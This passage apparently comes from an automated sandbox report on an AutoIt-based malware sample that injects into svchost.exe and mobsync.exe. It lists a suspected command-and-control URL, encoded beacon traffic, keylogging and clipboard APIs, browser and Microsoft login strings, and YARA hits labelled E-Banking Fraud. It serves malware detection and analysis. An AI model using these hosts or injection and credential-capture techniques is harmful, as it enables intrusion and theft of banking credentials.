    Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 38 37 44 6c 37 58 35 41 61 4b 59 75 65 6a 48 67 65 62 6c 4c 72 6b 48 31 39 4b 76 62 79 32 41 6f 52 4c 66 59 57 4e 55 76 77 73 49 6e 38 2b 77 58 67 3d 3d
    Data Ascii: A2jpdtl=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX87Dl7X5AaKYuejHgeblLrkH19Kvby2AoRLfYWNUvwsIn8+wXg==
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 20:07:48 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.2.34
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 20:07:50 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.2.34
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 20:07:53 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.2.34
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 20:07:56 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.2.34
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: LHSqcaLVnKQk.exe, 00000012.00000002.2542692952.0000000000BDA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net
                    Source: LHSqcaLVnKQk.exe, 00000012.00000002.2542692952.0000000000BDA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meliorahomes.net/ir1u/
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: mobsync.exe, 0000000F.00000003.2069677116.0000000007F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C64164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C64164
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C64164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C64164
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00164164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00164164
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C63F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00C63F66
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_00C5001C
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C7CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00C7CABC
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0017CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_0017CABC

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: This is a third-party compiled AutoIt script.5_2_00BF3B3A
                    Source: 25Lz840Dmh.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: 25Lz840Dmh.exe, 00000005.00000000.1274751332.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6b97aa45-e
                    Source: 25Lz840Dmh.exe, 00000005.00000000.1274751332.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6457b364-d
                    Source: 25Lz840Dmh.exe, 00000005.00000003.1287083806.0000000004013000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_735d0dcd-b
                    Source: 25Lz840Dmh.exe, 00000005.00000003.1287083806.0000000004013000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_30d3a38c-8
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: This is a third-party compiled AutoIt script.7_2_000F3B3A
                    Source: fricandeaus.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: fricandeaus.exe, 00000007.00000000.1289179428.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0adb7632-9
                    Source: fricandeaus.exe, 00000007.00000000.1289179428.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5064ea85-2
                    Source: fricandeaus.exe, 0000000B.00000000.1427722985.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_926df728-0
                    Source: fricandeaus.exe, 0000000B.00000000.1427722985.00000000001A4000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e18b9967-b
                    Source: 25Lz840Dmh.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ff9faf1e-8
                    Source: 25Lz840Dmh.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5ffb1bf6-a
                    Source: fricandeaus.exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dafcc579-e
                    Source: fricandeaus.exe.5.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_363806ae-0
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042C613 NtClose,9_2_0042C613
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372B60 NtClose,LdrInitializeThunk,9_2_03372B60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03372DF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033735C0 NtCreateMutant,LdrInitializeThunk,9_2_033735C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03374340 NtSetContextThread,9_2_03374340
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03374650 NtSuspendThread,9_2_03374650
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372BA0 NtEnumerateValueKey,9_2_03372BA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372B80 NtQueryInformationFile,9_2_03372B80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372BF0 NtAllocateVirtualMemory,9_2_03372BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372BE0 NtQueryValueKey,9_2_03372BE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372AB0 NtWaitForSingleObject,9_2_03372AB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372AF0 NtWriteFile,9_2_03372AF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372AD0 NtReadFile,9_2_03372AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372F30 NtCreateSection,9_2_03372F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372F60 NtCreateProcessEx,9_2_03372F60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372FB0 NtResumeThread,9_2_03372FB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372FA0 NtQuerySection,9_2_03372FA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372F90 NtProtectVirtualMemory,9_2_03372F90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372FE0 NtCreateFile,9_2_03372FE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372E30 NtWriteVirtualMemory,9_2_03372E30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372EA0 NtAdjustPrivilegesToken,9_2_03372EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372E80 NtReadVirtualMemory,9_2_03372E80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372EE0 NtQueueApcThread,9_2_03372EE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372D30 NtUnmapViewOfSection,9_2_03372D30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372D10 NtMapViewOfSection,9_2_03372D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372D00 NtSetInformationFile,9_2_03372D00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372DB0 NtEnumerateKey,9_2_03372DB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372DD0 NtDelayExecution,9_2_03372DD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372C00 NtQueryInformationProcess,9_2_03372C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372C70 NtFreeVirtualMemory,9_2_03372C70
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372C60 NtCreateKey,9_2_03372C60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372CA0 NtQueryInformationToken,9_2_03372CA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372CF0 NtOpenProcess,9_2_03372CF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372CC0 NtQueryVirtualMemory,9_2_03372CC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373010 NtOpenDirectoryObject,9_2_03373010
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373090 NtSetValueKey,9_2_03373090
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033739B0 NtGetContextThread,9_2_033739B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373D10 NtOpenProcessToken,9_2_03373D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03373D70 NtOpenThread,9_2_03373D70
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00C5A1EF
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C48310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00C48310
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00C551BD
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_001551BD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033569629_2_03356962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A09_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340A9A69_2_0340A9A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334A8409_2_0334A840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033428409_2_03342840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033268B89_2_033268B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E8F09_2_0336E8F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03360F309_2_03360F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E2F309_2_033E2F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03382F289_2_03382F28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B4F409_2_033B4F40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BEFA09_2_033BEFA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334CFE09_2_0334CFE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03332FC89_2_03332FC8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FEE269_2_033FEE26
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340E599_2_03340E59
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352E909_2_03352E90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FCE939_2_033FCE93
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FEEDB9_2_033FEEDB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DCD1F9_2_033DCD1F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334AD009_2_0334AD00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03358DBF9_2_03358DBF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333ADE09_2_0333ADE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340C009_2_03340C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0CB59_2_033E0CB5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330CF29_2_03330CF2
